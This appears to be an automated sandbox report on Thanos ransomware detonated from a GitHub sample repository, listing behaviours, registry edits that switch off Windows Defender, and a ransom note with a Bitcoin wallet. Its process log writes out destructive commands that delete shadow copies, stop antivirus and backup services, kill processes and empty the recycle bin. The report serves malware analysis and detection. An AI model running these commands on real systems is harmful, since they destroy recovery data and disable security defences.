Analysis Overview
Threat Level: Known bad
The file https://github.com/kh4sh3i/Ransomware-Samples was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Disables service(s)
Thanos family
Contains code to disable Windows Defender
Thanos Ransomware
Thanos executable
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
Downloads MZ/PE file
Windows security modification
Drops startup file
Checks computer location settings
Executes dropped EXE
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Launches sc.exe
Browser Information Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Enumerates system info in registry
Modifies registry class
Runs ping.exe
System policy modification
Modifies data under HKEY_USERS
Kills process with taskkill
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 13:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 13:45
Reported
2024-11-17 13:52
Platform
win10v2004-20241007-en
Max time kernel
349s
Max time network
313s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Thanos Ransomware
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Deletes shadow copies
Renames multiple (52) files with added filename extension
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\fsutil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\choice.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763247747343655" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | C:\Users\Admin\Desktop\2e7bx73r635634YXN2U92NXN9URN9Y8N3XRNY9.EXE | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/kh4sh3i/Ransomware-Samples
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa1fc0cc40,0x7ffa1fc0cc4c,0x7ffa1fc0cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3636,i,11388035454685092074,17425510288332417359,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3760 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ransomware.Thanos\" -spe -an -ai#7zMap12898:96:7zEvent11329
C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe
"C:\Users\Admin\Desktop\2377dbwhA727bebt7ezrwt7.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
